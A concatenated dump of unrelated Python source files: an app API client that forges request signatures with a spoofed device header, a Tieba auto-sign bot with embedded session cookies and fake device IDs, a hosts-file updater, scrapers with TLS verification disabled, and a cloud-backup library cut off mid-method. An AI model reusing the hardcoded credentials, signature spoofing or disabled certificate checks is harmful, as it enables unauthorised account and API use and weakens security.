tape[t + 1, m].set_to(tape[t, m])
final_is_halted.set_to(isHalted[numTimesteps - 1])
for p in range(tapeLength):
final_tape[p].set_to(tape[numTimesteps - 1, p])
``` |
{
"source": "51bitquant/CGEncryptBreak",
"score": 2
} |
#### File: CGEncryptBreak/CGEncryptBreak/HttpReq.py
```python
__author__ = 'zxlee'
import json
import requests
from requests.cookies import RequestsCookieJar
import urlparse
import base64
import re
import Encrypt
import time
import datetime
import urllib
import operator
main_url = 'http://192.168.3.11/cgapp-server/'
def json_dic(json_str):
try:
json_object = json.loads(json_str)
except ValueError, e:
json_object = {}
return json_object
def send_req(interface,data,post_type,token):
#sorted_data = {}
data = dict(sorted(data.items(),key=lambda d:d[1],reverse=True))
data_str = urllib.urlencode(data)
url = main_url + interface
up = urlparse.urlparse(url)
timestamp = str(int(round(time.time() * 1000)))
org_headers = {
"Accept": "*/*",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-Hans-CN;q=1",
"Connection": "close",
"Content-Length":str(len(data_str)),
"Content-Type": "application/x-www-form-urlencoded",
"Host": up.netloc,
"User-Agent": "ChingoItemCGTY(Linux; iOS 12.1;iPhone HUUID/13FDADFB-0EF7-4BDE-9631-65F08BA6BC31)",
"app-key": "<KEY>",
"sign":Encrypt.get_sign(interface,data,timestamp),
"timestamp":timestamp
}
if len(token):
org_headers.update({'cgAuthorization':token})
if post_type.upper() == 'POST':
res = requests.post(url,data=data_str,headers=org_headers)
elif post_type.upper() == 'PUT':
res = requests.put(url,data=data_str,headers=org_headers)
elif post_type.upper() == 'GET':
res = requests.get(url,data=data_str,headers=org_headers)
else:
print('TypeErr')
#if res.status_code != requests.codes.ok:
return json_dic(res.text)
``` |
{
"source": "51itclub/51itclub.github.io",
"score": 2
} |
#### File: 51itclub.github.io/pyAutoSign/TBSign.py
```python
import re
import time
import json
import urllib
import urllib2
import hashlib
#import threading
#from multiprocessing.pool import ThreadPool
COOKIE = {}
COOKIE['sbwtw_1'] = 'BDUSS=F<KEY>AAAGm4eFNpuHhTSU;'
COOKIE['sbwtw_2'] = 'BDUSS=<KEY>AAAKW4eFOluHhTY;'
COOKIE['sbwtw_3'] = 'BDUSS=hmbmZRR2ZrMkRIbG10M0xTOEdWd1FkdTltckpzQ3VKNG93ZEVXMzZuek1SYUJUQVFBQUFBJCQAAAAAAAAAAAEAAABR5WQwc2J3dHdfMwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMy4eFPMuHhTTj;'
COOKIE['sbwtw_4'] = 'BDUSS=<KEY>AAAO24eFPtuHhTZ;'
COOKIE['sbwtw_5'] = 'BDUSS=<KEY>FBJCQAAAAAAAAAAAEAAAB76mQwc2J3dHdfNQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA65eFMOuXhTck;'
COOKIE['sbwtw_6'] = 'BDUSS=JRSn5mTjVKVnptVWt0VGxMRlBzSmFyOWUxNXZCNDlmaVE4QmltZVR0OHN<KEY>ADl8mQwc2J3dHdfNgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACy5eFMsuXhTdG;'
COOKIE['sbwtw_7'] = 'BDUSS=Eh4TjR4Rmx0OEd3Y1RtZ0JISjBCdU81STNyWURHdkdBcnRnb1pEUWVEUk1ScUJUQVFBQUFBJCQAAAAAAAAAAAEAAACP9WQwc2J3dHdfNwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEy5eFNMuXhTc;'
COOKIE['sbwtw_8'] = 'BDUSS=<KEY>AAAAGe5eFNnuXhTeE;'
class TBSign():#threading.Thread):
def __init__(self, userName, cookie):
self.timeout = 5
self.userName = userName
self.cookie = cookie
self.barList = []
self.headers = {}
self.headers['Host'] = 'tieba.baidu.com'
self.headers['Referer'] = 'http://tieba.baidu.com/#'
self.headers['Content-Type'] = 'application/x-www-form-urlencoded'
self.headers['Cookie'] = cookie
self.headers['User-Agent'] = 'Mozilla/5.0 (Linux; x86_64;) firefox 32.0 Gecko'
#threading.Thread.__init__(self)
def run(self):
if not self.checkCookie():
return None
self.getBarList()
for i in self.barList:
try:
self.sign(i)
except:
print self.userName, 'sign', i, 'Fail !'
#sign
def sign(self, barName):
url = 'http://tieba.baidu.com/mo/m?kw=' + barName;
res = self.httpPost(url)
addr = re.search(r'<a\shref="([^"]+)">签到', res)
if not addr:
print self.userName, urllib.unquote(barName).decode('gbk').encode('utf-8'), 'already signed!'
return None
bduss = re.search(r'BDUSS=([^;]+);?', self.cookie)
data = {}
data['BDUSS'] = bduss.group(1)
sign = 'BDUSS=' + data['BDUSS']
data['_client_id'] = '04-00-DA-69-15-00-73-97-08-00-02-00-06-00-3C-43-01-00-34-F4-22-00-BC-35-19-01-5E-46'
sign += '_client_id=' + data['_client_id']
data['_client_type'] = '4'
sign += '_client_type=' + data['_client_type']
data['_client_version'] = '1.2.1.17'
sign += '_client_version=' + data['_client_version']
data['_phone_imei'] = '641b43b58d21b7a5814e1fd41b08e2a5'
sign += '_phone_imei=' + data['_phone_imei']
fid = re.search(r'fid"\svalue="(\w+)', res)
data['fid'] = fid.group(1)
sign += 'fid=' + data['fid']
#data['kw'] = urllib.quote(urllib.unquote(barName).decode('gbk').encode('utf-8'))
data['kw'] = urllib.unquote(barName).decode('gbk').encode('utf-8')
sign += 'kw=' + data['kw']
data['net_type'] = '3'
sign += 'net_type=' + data['net_type']
tbs = re.search(r'tbs"\svalue="(\w+)', res)
data['tbs'] = tbs.group(1)
sign += 'tbs=' + data['tbs']
sign += 'tiebaclient!!!'
data['sign'] = hashlib.md5(sign).hexdigest()
url = 'http://c.tieba.baidu.com/c/c/forum/sign'
res = self.toJson(self.httpPost(url, data))
try:
exp = res['user_info']['sign_bonus_point']
print self.userName, 'sign', urllib.unquote(barName).decode('gbk').encode('utf-8'), 'successful, add exp', exp
except:
print self.userName, urllib.unquote(barName).decode('gbk').encode('utf-8'), res
# get BarList
def getBarList(self):
page = 0
while True:
page += 1
url = 'http://tieba.baidu.com/f/like/mylike?pn=' + str(page)
res = self.httpPost(url)
if not res:
print self.userName, 'Find BarList Error'
return None
barList = re.findall(r'href="\/f\?kw=([^"]+)', res)
if len(barList):
self.barList += barList
else:
break
# check cookie
def checkCookie(self):
url = 'http://tieba.baidu.com/dc/common/tbs'
res = self.toJson(self.httpPost(url))
if res['is_login']:
self.tbs = res['tbs']
return True
else:
print self.userName, 'Cookie Error'
return None
# post
def httpPost(self, url, data = None):
if data:
data = urllib.urlencode(data)
req = urllib2.Request(url, headers=self.headers)
res = urllib2.urlopen(req, data, timeout = self.timeout)
try:
res = res.read()
except:
print self.userName, 'Http Post Error'
return None
return res
# convert json
def toJson(self, data):
try:
return json.loads(data)
except:
return None
for i in COOKIE:
#threadPool.add()
TBSign(i, COOKIE[i]).run()#.start()
```
#### File: 51itclub.github.io/updateDomain/crawlWebsiteAndExtractInfo.py
```python
import urllib2;
import re;
from BeautifulSoup import BeautifulSoup;
#------------------------------------------------------------------------------
def main():
userMainUrl = "http://www.songtaste.com/user/351979/";
req = urllib2.Request(userMainUrl);
resp = urllib2.urlopen(req);
respHtml = resp.read();
#print "respHtml=",respHtml; # you should see the ouput html
print "Method 1: Use python re to extract info from html";
#<h1 class="h1user">crifan</h1>
foundH1user = re.search('<h1\s+?class="h1user">(?P<h1user>.+?)</h1>', respHtml);
print "foundH1user=",foundH1user;
if(foundH1user):
h1user = foundH1user.group("h1user");
print "h1user=",h1user;
print "Method 2: Use python third lib BeautifulSoup to extract info from html";
songtasteHtmlEncoding = "GB2312";
soup = BeautifulSoup(respHtml, fromEncoding=songtasteHtmlEncoding);
#<h1 class="h1user">crifan</h1>
foundClassH1user = soup.find(attrs={"class":"h1user"});
print "foundClassH1user=%s",foundClassH1user;
if(foundClassH1user):
h1userStr = foundClassH1user.string;
print "h1userStr=",h1userStr;
###############################################################################
if __name__=="__main__":
main();
```
#### File: 51itclub.github.io/updateHostsPlus/updateHosts_1.py
```python
import urllib2
import platform
import datetime
import time
import re
import os
import shutil
import ConfigParser
import sys
import socket
import subprocess
# default setting
hosts_folder = ""
hosts_location = hosts_folder + "hosts"
source_list = ['https://raw.githubusercontent.com/vokins/simpleu/master/hosts']
not_block_sites = 0
always_on = 0
# default setting
#errorLog = open('errorLog.txt', 'a')
def get_cur_info():
return(sys._getframe().f_back.f_code.co_name)
def exit_this():
#errorLog.close()
sys.exit()
def check_connection():
sleep_seconds = 1200
i = 0
for i in range(sleep_seconds):
try:
socket.gethostbyname("www.baidu.com")
break
except socket.gaierror:
time.sleep(1)
if i == sleep_seconds - 1:
exit_this()
def check_system():
global hosts_folder
global hosts_location
if platform.system() == 'Windows':
hosts_folder = os.environ['SYSTEMROOT']+"\\System32\\drivers\\etc\\"
elif platform.system() == 'Linux'or platform.system() == 'Darwin':
hosts_folder = "/etc/"
else:
exit_this()
hosts_location = hosts_folder + "hosts"
def get_config():
global source_list
global not_block_sites
global always_on
if os.path.exists('config.ini'):
try:
# 清除Windows记事本自动添加的BOM
content = open('config.ini').read()
content = re.sub(r"\xfe\xff", "", content)
content = re.sub(r"\xff\xfe", "", content)
content = re.sub(r"\xef\xbb\xbf", "", content)
open('config.ini', 'w').write(content)
config = ConfigParser.ConfigParser()
config.read('config.ini')
source_id = config.get('source_select', 'source_id')
source_list = source_id.split(",")
for i in range(len(source_list)):
source_list[i]=config.get('source_select', 'source'+source_list[i])
not_block_sites = config.get("function", "not_block_sites")
always_on = config.get("function","always_on")
except BaseException, e:
#errorLog.write(str(datetime.datetime.now())+'\n'+'function:'+get_cur_info()+'\nerror:'+str(e)+'\n\n')
exit_this()
def backup_hosts():
try:
if (not os.path.isfile(hosts_folder + 'backup_hosts_original_by_updateHosts')) and \
os.path.isfile(hosts_folder + 'hosts'):
shutil.copy(hosts_folder+'hosts', hosts_folder+'backup_hosts_original_by_updateHosts')
if os.path.isfile(hosts_folder + 'hosts'):
shutil.copy(hosts_folder+'hosts', hosts_folder+'backup_hosts_last_by_updateHosts')
except BaseException, e:
#errorLog.write(str(datetime.datetime.now())+'\n'+'function:'+get_cur_info()+'\nerror:'+str(e)+'\n\n')
exit_this()
def download_hosts():
try:
if (not os.path.isfile("hosts_from_web")):
hosts_from_web = open("hosts_from_web","a")
for x in source_list:
#os.system("wget --no-check-certificate -c "+x+" -O hosts_from_web_tmp")
#data = open("hosts_from_web_tmp","r")
data=urllib2.urlopen(x)
#hosts_from_web.write(x+'\n')
hosts_from_web.write(data.read()+'\n')
data.close()
#os.remove('hosts_from_web_tmp')
hosts_from_web.close()
except BaseException, e:
#errorLog.write(str(datetime.datetime.now())+'\n'+'function:'+get_cur_info()+'\nerror:'+str(e)+'\n\n')
exit_this()
def process_hosts():
try:
hosts_content = open('hosts', 'w')
file_from_web = open('hosts_from_web')
hosts_from_web = file_from_web.read()
file_user_defined = open('hosts_user_defined.txt')
hosts_user_defined = file_user_defined.read()
hosts_content.write('#hosts_user_defined\n')
hosts_content.write(hosts_user_defined)
hosts_content.write('\n#hosts_user_defined\n')
hosts_content.write('\n\n#hosts_by_hostsUpdate\n\n')
if not_block_sites is "1":
hosts_from_web = re.sub("127.0.0.1", "#not_block_sites", hosts_from_web)
hosts_content.write(hosts_from_web)
hosts_content.write('\n#hosts_by_hostsUpdate')
hosts_content.close()
file_from_web.close()
file_user_defined.close()
except BaseException, e:
#errorLog.write(str(datetime.datetime.now())+'\n'+'function:'+get_cur_info()+'\nerror:'+str(e)+'\n\n')
exit_this()
def move_hosts():
try:
shutil.move("hosts", hosts_location)
os.remove('hosts_from_web')
except BaseException, e:
#errorLog.write(str(datetime.datetime.now())+'\n'+'function:'+get_cur_info()+'\nerror:'+str(e)+'\n\n')
exit_this()
def main():
check_connection()
check_system()
get_config()
backup_hosts()
download_hosts()
process_hosts()
move_hosts()
#errorLog.close()
if __name__ == '__main__':
main()
if always_on == "1":
while 1:
time.sleep(3600)
main()
``` |
{
"source": "51MPLYR3DD/hr-python",
"score": 3
} |
#### File: hr-python/eye-identity/main.py
```python
import numpy as np
def main():
user_input = input()
n = int(user_input[0])
m = int(user_input[2])
print(np.eye(n, m))
if __name__ == '__main__':
main()
``` |
{
"source": "51Sirius/MyBlog",
"score": 3
} |
#### File: 51Sirius/MyBlog/models.py
```python
from flask_sqlalchemy import SQLAlchemy
from werkzeug.security import generate_password_hash, check_password_hash
from flask_login import UserMixin
db = SQLAlchemy()
class Users(db.Model, UserMixin):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(64), index=True, unique=True)
email = db.Column(db.String(120), index=True, unique=True)
password = db.Column(db.String(255), nullable=True)
score = db.Column(db.Integer, default=0)
class_user = db.Column(db.Integer, default=5)
level = db.Column(db.Integer, default=1)
last_answer = db.Column(db.String, default=None)
snake = db.Column(db.Integer, default=0)
tetris = db.Column(db.Integer, default=0)
def set_password(self, password):
self.password = generate_password_hash(password)
def check_password(self, password):
return check_password_hash(self.password, password)
def __repr__(self):
return '<User {}>'.format(self.username)
``` |
{
"source": "51xiongmao/ligui.org",
"score": 3
} |
#### File: 51xiongmao/ligui.org/ligui.org.py
```python
import requests, os
import warnings
warnings.filterwarnings("ignore")
from lxml import etree
import urllib
from urllib.request import urlopen
import re, time
def geturl(classification):
global list
headers = {
'User-Agent': 'Mozilla/5.0 (Linux; Android 8.0; Pixel 2 Build/OPD3.170816.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Mobile Safari/537.36 Edg/84.0.522.52'
}
req = urllib.request.Request("https://ligui.org/" + classification, headers=headers)
print('1、正在打开网址...' + "https://ligui.org/" + classification)
website = urlopen(req,timeout=120)
html = website.read().decode('utf8')
website.close()
print('2、正在查找符合条件的图片网址...')
links = re.findall(r'/' + classification + '/.*?.html',html)
#links = sorted(set(links),key=links.index)
list = []
print('3、开始准备图片网址列表内容。。。')
for link in links:
aurl = 'https://ligui.org' + link
list.append(aurl)
res = requests.get("https://ligui.org/" + classification, headers=headers, verify =False).text
res = etree.HTML(res)
page = re.findall(r"\d+?\d*", str(res.xpath('/html/body/div[1]/div[8]/div[3]/ul/li[8]/a/@href')))[1]
if classification == 'beautyleg':
num = "1"
elif classification == 'iess':
num = "2"
elif classification == 'ligui':
num = "3"
elif classification == 'simu':
num = "5"
i = 2
while i < int(page)+1:
res = requests.get(url="https://ligui.org/" + classification + "/" + num + "_" + str(i) + ".html", headers=headers, verify =False).text
res = etree.HTML(res)
data = res.xpath('/html/body/div[1]/div[8]/div[1]/div/a/@href')
for j in range(len(data)):
list.append('https://ligui.org' + str(data[j]))
i += 1
list = sorted(set(list),key=list.index)
print('列表内容准备完毕,下面开始下载图片。。。')
return list
def downimg(imgurl):
newcount = len(list)
h = 1
while h < newcount:
a = 0
url = list[h]
print(url)
fo = open("url.txt", "r")
for url_list in fo.readlines():
if url_list.strip() == url.strip():
print("已经下载,忽略该链接")
h += 1
a = 1
break
if a == 1:
continue
fo.close()
headers = {
'User-Agent': 'Mozilla/5.0 (Linux; Android 8.0; Pixel 2 Build/OPD3.170816.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Mobile Safari/537.36 Edg/84.0.522.52'
}
list1 = []
res = requests.get(url, headers=headers, verify =False, stream=True).text
res = etree.HTML(res)
try:
title = res.xpath('/html/body/div[1]/div[5]/div/div[1]/h1/text()')[0].encode('ISO-8859-1').decode('UTF-8')
title = re.sub('[\/:*?"<>|]','',title)
except BaseException:
h += 1
error_url_txt = open('error_url.txt', 'a')
error_url_txt.write(str(url))
error_url_txt.write('\n')
error_url_txt.close()
continue
page = re.findall(r"\d+\.?\d*", str(res.xpath('/html/body/div[1]/div[5]/div/div[1]/div[3]/div[4]/ul/li[1]/a/text()')[0]))
data = res.xpath('/html/body/div[1]/div[5]/div/div[1]/div[3]/div[1]/a/img/@src')
for j in range(len(data)):
list1.append(data[j])
i = 2
while i < int(page[0])+1:
urls = url.replace(".html", "_" + str(i) + ".html");
res = requests.get(url=urls, headers=headers, verify =False, stream=True).text
res = etree.HTML(res)
data = res.xpath('/html/body/div[1]/div[5]/div/div[1]/div[3]/div[1]/a/img/@src')
for j in range(len(data)):
list1.append(data[j])
i += 1
path = './%s/' % title
if not os.path.exists(path): # 判断如果文件不存在,则创建
os.makedirs(path)
print("目录创建成功")
else:
print("目录已经存在")
print('开始下载!!!')
for i in range(len(list1)):
jpg_url = list1[i]
print(jpg_url)
try:
res = requests.get(jpg_url, verify =False, stream=True).content
except BaseException:
continue
with open('%s/%s.jpg' % (title, i), 'wb') as fp:
fp.write(res)
print('第' + str(i) + '张图片下载完成!')
#time.sleep(2)
print('第' + str(h) + '个图片网址下载完成!!!')
url_txt = open('url.txt', 'a')
url_txt.write(str(url))
url_txt.write('\n')
url_txt.close()
h += 1
if __name__ == '__main__':
print('准备开始工作了。。。')
classification = ['beautyleg', 'iess', 'ligui', 'simu']
for i in range(len(classification)):
geturl(classification[i])
downimg(list)
``` |
{
"source": "520github/CloudBackup",
"score": 2
} |
#### File: CloudBackup/CloudBackup/cloud.py
```python
from CloudBackup.lib.vdisk import VdiskClient
from CloudBackup.lib.s3 import (S3Client, get_end_point as s3_get_end_point, ALL_USERS_URI,
ACL_PERMISSION as S3_ACL_PERMISSION,
S3AclGrantByURI, S3AclGrantByPersonID)
from CloudBackup.lib.gs import (GSClient, GSAclGrantByAllUsers,
ACL_PERMISSION as GS_ACL_PERMISSION,
get_end_point as gs_get_end_point)
from CloudBackup.lib.errors import VdiskError, S3Error
from CloudBackup.utils import join_path
__author__ = "<NAME>"
class Storage(object):
def _ensure_cloud_path_legal(self, cloud_path):
return cloud_path.strip('/')
def set_holder(self, holder_name):
raise NotImplementedError
def _ensure_holder_exist(self, holder_name):
raise NotImplementedError
def upload(self, cloud_path, filename):
raise NotImplementedError
def download(self, cloud_path, filename):
raise NotImplementedError
def delete(self, cloud_path, filename):
raise NotImplementedError
def list(self, cloud_path, recursive=False):
raise NotImplementedError
def list_files(self, cloud_path, recursive=False):
raise NotImplementedError
def info(self, cloud_path):
raise NotImplementedError
def share(self, cloud_path):
raise NotImplementedError
class CloudFile(object):
def __init__(self, path, content_type, md5, **kwargs):
self.path = path
self.content_type = content_type
self.md5 = md5
for k, v in kwargs.iteritems():
setattr(self, k, v)
class CloudFolder(object):
def __init__(self, path, **kwargs):
self.path = path
for k, v in kwargs.iteritems():
setattr(self, k, v)
class VdiskStorage(Storage):
def __init__(self, client, cache={}, holder_name=''):
'''
:param client: must be VdiskClient or it's subclass, CryptoVdiskClient eg.
:param cache(optional): the cache to store key-value-pair-> path: id, blank dict as default.
:param holder_name(optional): the folder that holder the content, blank as default.
'''
assert isinstance(client, VdiskClient)
self.cache = cache
self.client = client
self.holder = holder_name
if self.holder:
self._ensure_holder_exist(self.holder)
def set_holder(self, holder_name):
self.holder = holder_name
self._ensure_holder_exist(self.holder)
def _ensure_holder_exist(self, holder_name):
self._get_cloud_dir_id(self.holder, True)
def _ensure_cloud_path_legal(self, cloud_path):
path = join_path(self.holder, cloud_path)
return super(VdiskStorage, self)._ensure_cloud_path_legal(path)
def _get_cloud_dir_id(self, cloud_path, create_if_not_exist=False):
if len(cloud_path) == 0:
return 0
if isinstance(cloud_path, unicode):
cloud_path = cloud_path.encode('utf-8')
dir_id = self.cache.get(cloud_path, 0)
if dir_id != 0:
return dir_id
path = '/' + cloud_path if not cloud_path.startswith('/') else cloud_path
try:
dir_id = self.client.get_dirid_with_path(path)
self.cache[cloud_path] = str(dir_id)
return dir_id
except VdiskError, e:
if create_if_not_exist and e.err_no == 3: # means the dir not exist
parent_id = 0
if '/' in cloud_path:
parent_path, name = tuple(cloud_path.rsplit('/', 1))
parent_id = self._get_cloud_dir_id(parent_path,
create_if_not_exist=create_if_not_exist)
else:
name = cloud_path
data = self.client.create_dir(name, parent_id)
self.cache[cloud_path] = data.dir_id
return data.dir_id
else:
raise e
def _get_cloud_file_id(self, cloud_path, include_name=False):
if cloud_path in self.cache:
return self.cache[cloud_path]
if isinstance(cloud_path, unicode):
cloud_path = cloud_path.encode('utf-8')
dir_id = 0
if '/' in cloud_path:
dir_path, name = tuple(cloud_path.rsplit('/', 1))
dir_id = self._get_cloud_dir_id(dir_path)
else:
dir_path, name = '', cloud_path
has_next = True
c_page = 1
while has_next:
result = self.client.getlist(dir_id, page=c_page)
if c_page >= result.pageinfo.pageTotal:
has_next = False
else:
c_page += 1
for itm in result.list:
if itm.name == name.decode('utf-8'):
self.cache[cloud_path] = itm.id
if include_name:
return itm.id, itm.name
return itm.id
raise VdiskError(-1, 'File does\'t exist.')
def upload(self, cloud_path, filename, cover=True):
'''
Upload local file to the cloud.
:param cloud_path: the path on the cloud, 'test/file.txt' eg, not need to start with '/'
:param filename: the local file's absolute path.
:cover(optional): set True to cover the file with the same name if exists. True as default.
'''
cloud_path = self._ensure_cloud_path_legal(cloud_path)
dir_id = 0
if '/' in cloud_path:
dir_path, cloud_name = tuple(cloud_path.rsplit('/', 1))
dir_id = self._get_cloud_dir_id(dir_path, create_if_not_exist=True)
else:
cloud_name = cloud_path
self.client.upload_file(filename, dir_id, cover, upload_name=cloud_name)
def download(self, cloud_path, filename):
'''
Download the file to local from cloud.
:param cloud_path: the path on the cloud, 'test/file.txt' eg, not need to start with '/'
:param filename: the local file's absolute path.
'''
cloud_path = self._ensure_cloud_path_legal(cloud_path)
fid = self._get_cloud_file_id(cloud_path)
self.client.download_file(fid, filename)
def delete(self, cloud_path):
'''
Delete the path in the cloud. If folder, delete all files and folders it contains.
:param cloud_path: the path on the cloud, 'test/file.txt' eg, not need to start with '/'
'''
cloud_path = self._ensure_cloud_path_legal(cloud_path)
try:
dir_id = self._get_cloud_dir_id(cloud_path)
self.client.delete_dir(dir_id)
except VdiskError:
fid = self._get_cloud_file_id(cloud_path)
self.client.delete_file(fid)
def list(self, cloud_path, recursive=False):
'''
List all objects include folders and files in a cloud path.
:param cloud_path: the path on the cloud, 'test' eg, not need to start with '/'
list the root path if set to blank('').
:param recursive(Optional): if set to True, will return the objects recursively.
:return: it doesn't return all the objects immediately,
it returns an object each time, and then another, and goes on.
you shoud iterate them by for loop.
of course, you can use list() to put them all into memory,
however, it is not recommended.
'''
cloud_path = self._ensure_cloud_path_legal(cloud_path)
dir_path = '/' + cloud_path
dir_id = self._get_cloud_dir_id(dir_path)
has_next = True
c_page = 1
while has_next:
result = self.client.getlist(dir_id, page=c_page)
if c_page >= result.pageinfo.pageTotal:
has_next = False
else:
c_page += 1
for itm in result.list:
path = join_path(cloud_path, itm.name)
if self.holder:
path = path.split(self.holder+'/', 1)[1]
if 'url' in itm:
yield CloudFile(path, itm.type, itm.md5, id=itm.id)
else:
yield CloudFolder(path, id=itm.id)
if recursive and itm.file_num + itm.dir_num > 0:
for obj in self.list(path, recursive):
yield obj
def list_files(self, cloud_path, recursive=False):
'''
List all the files in a cloud path.
:param cloud_path: the path on the cloud, 'test' eg, not need to start with '/'
list the root path if set to blank('').
:param recursive(Optional): if set to True, will return the files recursively.
:return: it doesn't return all the files immediately,
it returns a file(a CloudFile instance) each time, and then another, and goes on.
you shoud iterate them by for loop.
of course, you can use list() to put them all into memory,
however, it is not recommended.
'''
for obj in self.list(cloud_path, recursive):
if isinstance(obj, CloudFile):
yield obj
def info(self, cloud_path):
'''
Get the infomation of a file on the cloud.
:param cloud_path: the path on the cloud, 'test/file.txt' eg, not need to start with '/'.
:return: an instance of CloudFile.
'''
cloud_path = self._ensure_cloud_path_legal(cloud_path)
fid = self._get_cloud_file_id(cloud_path)
kwargs = dict(self.client.get_file_info(fid))
if self.holder:
kwargs['path'] = cloud_path.split(self.holder+'/', 1)[1]
else:
kwargs['path'] = cloud_path
kwargs['content_type'] = kwargs.pop('type')
return CloudFile(**kwargs)
def share(self, cloud_path):
'''
Share a file on the cloud.
param cloud_path: the path on the cloud, 'test/file.txt' eg, not need to start with '/'.
:return: the path to download.
'''
cloud_path = self._ensure_cloud_path_legal(cloud_path)
fid = self._get_cloud_file_id(cloud_path)
return self.client.share_file(fid).download_page
class S3Storage(Storage):
def __init__(self, client, holder_name):
'''
:param client: must be S3Client or it's subclass, CryptoS3Client eg.
:param holder_name: the folder that holder the content.
In Amazon S3, you can only store files into a bucket,
which means the holder here.
You have to define the holder with the unique name to store files.
'''
assert isinstance(client, S3Client)
self.client = client
self.holder = holder_name
self._ensure_holder_exist(self.holder)
def _ensure_holder_exist(self, holder_name):
for bucket in self.client.list_buckets()[1]:
if bucket.name == holder_name:
return
self.client.put_bucket(holder_name)
def set_holder(self, holder_name):
self.holder = holder_name
self._ensure_holder_exist(self.holder)
def upload(self, cloud_path, filename):
'''
Upload local file to the cloud.
:param cloud_path: the path on the cloud, 'test/file.txt' eg, not need to start with '/'
:param filename: the local file's absolute path.
'''
cloud_path = self._ensure_cloud_path_legal(cloud_path)
self.client.upload_file(filename, self.holder, cloud_path)
def download(self, cloud_path, filename):
'''
Download the file to local from cloud.
:param cloud_path: the path on the cloud, 'test/file.txt' eg, not need to start with '/'
:param filename: the local file's absolute path.
'''
cloud_path = self._ensure_cloud_path_legal(cloud_path)
if isinstance(cloud_path, unicode): cloud_path = cloud_path.encode('utf-8')
self.client.download_file(filename, self.holder, cloud_path)
def delete(self, cloud_path):
'''
Delete the path in the cloud. If folder, delete all files and folders it contains.
:param cloud_path: the path on the cloud, 'test/file.txt' eg, not need to start with '/'
'''
cloud_path = self._ensure_cloud_path_legal(cloud_path)
self.client.delete_object(self.holder, cloud_path)
for obj in self.list_files(cloud_path, recursive=True):
self.client.delete_object(self.holder, obj.path)
def _get_cloud_file(self, s3_obj):
content_type = getattr(s3_obj, 'content_type', '')
md5 = s3_obj.etag.strip('"')
return CloudFile(s3_obj.key, content_type, md5)
def list(self, cloud_path, recursive=False):
'''
List all objects including folders and files in a cloud path.
:param cloud_path: the path on the cloud, 'test' eg, not need to start with '/'
list the root path if set to blank('').
:param recursive(Optional): if set to True, will return the objects recursively.
:return: it doesn't return all the objects immediately,
it returns an object each time, and then another, and goes on.
you shoud iterate them by for loop.
of course, you can use list() to put them all into memory,
however, it is not recommended.
'''
cloud_path = self._ensure_cloud_path_legal(cloud_path)
if isinstance(cloud_path, unicode): cloud_path = cloud_path.encode('utf-8')
prefix = '' if not cloud_path else cloud_path+'/'
objs, common_prefix, has_next = self.client.get_bucket(self.holder,
prefix=prefix,
delimiter='/')
for obj in objs:
yield self._get_cloud_file(obj)
while has_next:
marker = objs[-1].key
objs, common_prefix, has_next = self.client.get_bucket(self.holder,
prefix=prefix,
delimiter='/',
marker=marker)
for obj in objs:
yield self._get_cloud_file(obj)
for prefix in common_prefix:
yield CloudFolder(self._ensure_cloud_path_legal(prefix))
if recursive:
for prefix in common_prefix:
for obj in self.list(prefix, recursive):
yield obj
def list_files(self, cloud_path, recursive=False):
'''
List all the files in a cloud path.
:param cloud_path: the path on the cloud, 'test' eg, not need to start with '/'
list the root path if set to blank('').
:param recursive(Optional): if set to True, will return the files recursively.
:return: it doesn't return all the files immediately,
it returns a file(a CloudFile instance) each time, and then another, and goes on.
you shoud iterate them by for loop.
of course, you can use list() to put them all into memory,
however, it is not recommended.
'''
cloud_path = self._ensure_cloud_path_legal(cloud_path)
prefix = '' if not cloud_path else cloud_path+'/'
kwargs = {'prefix': prefix}
if not recursive:
kwargs['delimiter'] = '/'
objs, _, has_next = self.client.get_bucket(self.holder, **kwargs)
for obj in objs:
yield self._get_cloud_file(obj)
while has_next:
marker = objs[-1].key
kwargs['marker'] = marker
objs, _, has_next = self.client.get_bucket(self.holder, **kwargs)
for obj in objs:
yield self._get_cloud_file(obj)
def info(self, cloud_path):
'''
Get the infomation of a file on the cloud.
:param cloud_path: the path on the cloud, 'test/file.txt' eg, not need to start with '/'.
:return: an instance of CloudFile.
'''
cloud_path = self._ensure_cloud_path_legal(cloud_path)
s3_obj = self.client.get_object(self.holder, cloud_path)
kwargs = {}
for attr in dir(s3_obj):
if not attr.startswith('_') \
and attr != 'mapping' \
and attr != 'from_xml':
kwargs[attr] = getattr(s3_obj, attr)
kwargs['md5'] = kwargs.pop('etag').strip('"')
kwargs['path'] = cloud_path
return CloudFile(**kwargs)
def share(self, cloud_path):
'''
Share a file on the cloud.
param cloud_path: the path on the cloud, 'test/file.txt' eg, not need to start with '/'.
:return: the path to download.
'''
cloud_path = self._ensure_cloud_path_legal(cloud_path)
if hasattr(self.client, 'owner'):
owner = self.client.owner
else:
owner = self.client.get_object_acl(self.holder, cloud_path)[0]
self.client.set_owner(owner)
all_user_grant = S3AclGrantByURI(ALL_USERS_URI, S3_ACL_PERMISSION.read)
owner_grant = S3AclGrantByPersonID(owner, S3_ACL_PERMISSION.full_control)
self.client.put_object_acl(self.holder, cloud_path, owner, all_user_grant, owner_grant)
return s3_get_end_point(self.holder, cloud_path, True)
class GSStorage(S3Storage):
def __init__(self, client, holder_name):
'''
:param client: must be S3Client or it's subclass, CryptoS3Client eg.
:param holder_name: the folder that holder the content.
In Amazon S3, you can only store files into a bucket,
which means the holder here.
You have to define the holder with the unique name to store files.
'''
assert isinstance(client, GSClient)
self.client = client
self.holder = holder_name
self._ensure_holder_exist(self.holder)
def _ensure_holder_exist(self, holder_name):
for bucket in self.client.get_service()[1]:
if bucket.name == holder_name:
return
self.client.put_bucket(holder_name)
def share(self, cloud_path):
'''
Share a file on the cloud.
param cloud_path: the path on the cloud, 'test/file.txt' eg, not need to start with '/'.
:return: the path to download.
'''
